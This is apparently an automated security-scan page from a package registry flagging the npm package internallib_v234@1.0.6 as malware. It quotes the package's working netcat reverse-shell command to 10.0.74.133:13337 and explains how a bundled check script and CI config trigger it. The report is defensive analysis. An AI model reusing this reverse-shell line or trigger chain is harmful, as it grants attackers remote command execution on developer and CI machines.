registry  /  internallib_v234  /  1.0.6

internallib_v234@1.0.6

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package entrypoint exposes a command that launches a netcat reverse shell to a hardcoded private IP and port. A bundled check script and CI config invoke that command.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
Calling exports.command(), including via node check.js in CI
Impact
Remote shell execution from the consuming environment when the command is invoked.
Mechanism
child_process exec netcat reverse shell
Attack narrative
When command() is invoked, index.js first checks for netcat and then executes a bash command that starts nc to 10.0.74.133:13337 with /bin/bash attached. The included check.js calls this export, and the GitLab CI config runs check.js, creating a reachable reverse-shell path in automated environments.
Rationale
Direct source inspection confirms concrete reverse-shell behavior reachable through the package export and bundled CI check script. This is not package-aligned functionality and enables unauthorized remote command execution.
Evidence
index.jscheck.jspackage.json.gitlab-ci.yml/bin/bash
Network endpoints1
10.0.74.133:13337

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js exports command() that runs child_process.exec.
  • index.js probes for nc with whereis nc.
  • index.js executes /bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash".
  • check.js imports internallib_v234 and calls command().
  • .gitlab-ci.yml runs node check.js after npm update, making the reverse shell reachable in CI.
Evidence against
  • package.json has no npm lifecycle hook.
  • No credential harvesting or file exfiltration code found beyond the reverse shell.
Behavioral surface
Source
ChildProcessShell
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 444 B of source

Source & flagged code

4 flagged · loading source
index.jsView file
1const { exec } = require('child_process'); L2: ... L5: L6: exec('whereis nc', (error, stdout, stderr) => { L7: if (error) { ... L13: L14: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"'); L15:
Critical
Reverse Shell

Source matches reverse-shell style process and socket wiring.

index.jsView on unpkg · L1
1Trigger-reachable chain: manifest.main -> index.js L1: const { exec } = require('child_process'); L2: ... L5: L6: exec('whereis nc', (error, stdout, stderr) => { L7: if (error) { ... L13: L14: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"'); L15:
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.jsView on unpkg · L1
1const { exec } = require('child_process'); L2:
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L1
13L14: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"'); L15:
High
Shell

Package source references shell execution.

index.jsView on unpkg · L13

Findings

2 Critical2 High1 Low
CriticalReverse Shellindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighChild Processindex.js
HighShellindex.js
LowScripts Present